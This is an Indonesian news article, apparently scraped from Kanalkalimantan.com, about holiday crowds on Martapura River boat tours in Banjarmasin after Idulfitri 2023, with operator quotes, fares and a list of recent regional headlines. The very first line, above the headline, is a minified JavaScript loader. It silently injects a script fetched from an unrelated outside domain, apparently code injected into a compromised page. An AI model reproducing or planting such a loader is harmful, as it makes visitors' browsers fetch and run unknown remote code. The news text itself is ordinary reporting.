(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
HEADLINE

Libur Lebaran di Banjarmasin, Wisata Susur Sungai Martapura Jadi Primadona


KANALKALIMANTAN.COM, BANJARMASIN – Dua hari setelah perayaan Idulfitri 1444 hijriyah, kawasan wisata Siring Menara Pandang Banjarmasin dipadati pengunjung.

Pantauan Kanalkalimantan.com Senin (24/4/2023) sore, ratusan pengunjung yang terdiri dari anak-anak hingga orang dewasa menghabiskan waktu pada saat terbenam matahari untuk menikmati keindahan Sungai Martapura yang terletak di jantung kota berjuluk Seribu Sungai ini.

Salah satu objek wisata yang menjadi primadona pengunjung yaitu susur Sungai Martapura dengan menaiki kelotok atau perahu mesin khas Kalimantan Selatan.

Wisatawan susur sungai yang didominasi anak-anak muda terlihat banyak duduk di atap klotok untuk menikmati keindahan Sungai Martapura dan juga untuk mengabadikan moment menyusuri Sungai Martapura.

Baca juga: Arus Balik di Pelabuhan Trisakti Masih sepi, Kapal Bersandar Mulai H+5 Lebaran

“Memang pengunjung lebih banyak jika dibandingkan tahun lalu saat masih pandemi,” kata salah satu pengelola klotok wisata Susur Sungai H Syam.

H Syam mengatakan pihaknya menyediakan jasa susur sungai dari jarak yang paling jauh ke Pulau Kembang dan Lok Baintan, hingga yang paling dekat di sekitar Siring Menara Pandang dan Patung Bekantan.

Untuk biaya, dikatakan H Syam bisa sewa satu unit klotok atau bayar perorangan. Misalnya ke Pasar Terapung Lok Baintan pengunjung bisa memilih menggunakan klotok yang lama atau klotok baru dengan tarif yang berbeda.

“Kalau ke Lok Baintan itu Rp 450 ribu, kalau pakai klotok yang baru itu Rp 600 ribu,” ungkapnya.

Sementara itu, dikatakannya hari kedua setelah lebaran, pengunjung lebih banyak menaiki kelotok yang menyusuri Sungai Martapura menuju objek Wisata Kampung Biru dengan tarif Rp 10 ribu per orang.

Wisata susur Sungai Martapura menggunakan klotok di kawasan Siring Menara Pandang, Kota Banjarmasin pada H+2 Lebaran. Foto: Rizki

Dari data armada wisata susur sungai yang ada, setidaknya terdapat 88 buah klotok wisata yang terdapat di kawasan Siring Menara Pandang Banjarmasin. Semuanya beroperasi secara bergantian dengan masing-masing klotok dioperasikan oleh seorang juru mudi kapal.

Baca juga: Bayi Dibuang Dalam Kardus Kondisi Sehat, Polisi Buru Pelaku

“Total keseluruhan klotok di sini 88 buah, jadi mereka bergantian menariknya. Supaya semuanya mendapatkan penumpang,” sebut H Syam.

Lebih lanjut dikatakannya wisata susur sungai di kawasan Siring Menara Pandang buka setiap hari, baik hari kerja maupun hari libur.

Selain siang hari, wisata susur sungai juga dibuka pada waktu malam hari, untuk rute seperti kawasan Kampung Biru atau sekitar Siring Menara Pandang dan Patung Bekantan. (Kanalkalimantan.com/rizki)

Reporter: rizki
Editor: bie


Al Ghifari

Recent Posts

Pj Bupati Kapuas Erlin Hardi ke Desa Tumbang Mangkutup

KANALKALIMANTAN.COM, KUALA KAPUAS - Penjabat (Pj) Bupati Kapuas, Erlin Hardi bersilaturahmi dengan masyarakat Desa Tumbang… Read More

8 jam ago

Satgas TMMD Beri Penyuluhan Pertanian dan Perikanan di Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Setelah program non fisik sosialisasi PHBS (Perilaku Hidup bersih Sehat) dan masalah… Read More

8 jam ago

Banjarbaru Posisi Kedua Klasemen Sementara Popda Kalsel 2024

KANALKALIMANTAN.COM, BANJARBARU - Sejumlah cabang olahraga (cabor) unggulan membawa kontingen Kota Banjarbaru bertengger di posisi… Read More

11 jam ago

Hasnur Resmi Lamar Partai Golkar, Mencari ‘Pintu’ Koalisi Pilgub Kalsel

KANALKALIMANTAN.COM, BANJARMASIN - Langkah Hasnuryadi Sulaiman untuk maju pada kontestasi Pemilihan Gubernur dan Wakil Gubernur… Read More

12 jam ago

Pasti Maju Pilwali Banjarbaru, Ovie Simpan Nama Pasangan

KANALKALIMANTAN.COM, BANJARBARU - Aditya Mufti Ariffin memastikan akan kembali berkontestasi dalam Pemilihan Kepala Daerah (Pilkada)… Read More

13 jam ago

Soal Caleg Terpilih Mundur atau Tidak Mundur Jika Maju Pilkada, Begini Penjelasan KPU Kalsel

KANALKALIMANTAN.COM, BANJARMASIN - Anggota Komisi Pemilihan Umum (KPU) Provinsi Kalimantan Selatan (Kalsel), Fahmi Failasopa menegaskan… Read More

16 jam ago

This website uses cookies.